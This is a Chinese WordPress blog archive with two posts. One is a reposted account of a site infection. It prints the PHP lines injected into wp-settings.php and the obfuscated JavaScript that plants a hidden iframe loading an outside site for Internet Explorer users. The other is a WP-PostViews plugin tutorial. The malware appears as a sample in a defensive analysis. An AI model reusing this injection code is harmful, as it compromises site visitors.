Category Archives: WordPress

以下内容为转载：

最近两个blog都不消停，总有木马嵌入的报告。是可忍孰不可忍，在今早收到google Webmaster的通知之后，决定彻底的查一下这个感染的原因。

登上FTP，看到wp-settings.php这个文件更新日期和其他的都不一样，就下下他来。然后和标准的安装包自带的wp-settings.php进行比对，果然发现多了这么几行：

function check_wordpress(){

$t_d = sys_get_temp_dir();

if(file_exists($t_d . '/wp_inc')){

readfile($t_d . '/wp_inc');

}

}

add_action('wp_head', 'check_wordpress');



遂加了一行echo $t_d. '/wp_inc' ;，华丽丽的发现输出了一个/tmp。这个时候访问blog并查看源文件，发现有一行代码被嵌入：

eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height|width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|nl|msie|toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|hggf|navigator|ai|showthread|php|72241732'.split('|'),0,{}))

// ]]>

这就是一切祸首的来源！

总结一下，这个木马的入侵模式为：修改wp-settings.php文件，然后调用系统临时文件夹/tmp下的wp_inc文件，然后嵌入到网站的里面，实现JS入侵。

最简单的屏蔽办法自然是覆盖wp-settings.php文件，然后这行代码的嵌入果然消失了，网站也就没问题了。然而最大的问题则是，服务器已经被感染了，他会不断的重写wp-settings.php文件，而且就算我把文件的权限设为600（只读）而不是644也无济于事。这下子，我也不知道应该怎么办了……看了一下google的report，貌似整个服务器上有很多网站都中招了，汗。

围观老外讨论：http://wordpress.org/support/topic/my-website-is-infected-with-mass-iframe-injection-attack-2

WordPress默认不显示文章和页面的访客浏览次数，可以通过安装浏览次数统计插件来添加显示文章浏览量功能。大家推荐的是WP-PostViews文章浏览统计插件。

WP-PostViews插件安装

1. 在管理后台找到添加插件选项，输入关键词”postview”搜索插件第一条就是“WP-PostViews”。点击安装。或者直接到WP-PostViews插件作者主页下载安装包，再将文件夹wp-postviews上传到/wp-content/plugins/目录下。最后在管理后台点击“启用”即可。

WP-PostViews插件调用代码

2. 到这里，只是将wp-postviews插件安装好了，文章浏览次数还不会自动显示。还需要你在要让文章浏览次数显示的地方加入代码调用函数。所以打开WordPress任何你想添加浏览次数统计的文章页面，如你在用的theme主题下的首页index.php，单篇文章页面single.php，文章存档页archive.php，page.php，以及后台文章管理页面post.php 等…

找到以下代码：<?php while (have_posts()) : the_post(); ?>

在它后面任何适当的地方加入调用函数显示浏览次数，即添加以下代码：

<?php if(function_exists('the_views')) { the_views(); } ?>

WP-PostViews插件设置

3. 代码添加完毕，就可以进入wp 管理后台进行选项设置：wp控制板–设置–PostViews。根据自己的要求设置是否记录自己的点击，是否记录搜索引擎机器人的访问，浏览次数显示格式，权限设置等等，最后点击”Save Changes”保存即可。

WP-PostViews 热门文章排行

4. 同时配合WP-PostViews Widgets插件或者只调用函数都可以在边栏sidebar 等页面实现更多的功能，具体请查看插件作者的使用说明：WP-PostViews Usage ，有详细介绍。下面以按浏览量排行(Most Viewed Posts)为例说明WP-PostViews插件的应用:

比如要在sidebar中显示浏览次数最高的文章(页面)排行，可以使用下面的代码：

<?php if (function_exists('get_most_viewed')): ?>
   <ul>
      <?php get_most_viewed(); ?>
   </ul>
<?php endif; ?>

其中get_most_viewed()的第一个参数为你要将文章还是页面进行排行，还是两者都要。参数分别为post,page,both。第二个参数传递的是你想最多显示几篇文章(页面)。默认为：get_most_viewed(‘both’, 10);

有需要帮忙的同学可以说声，发帖纪念一下！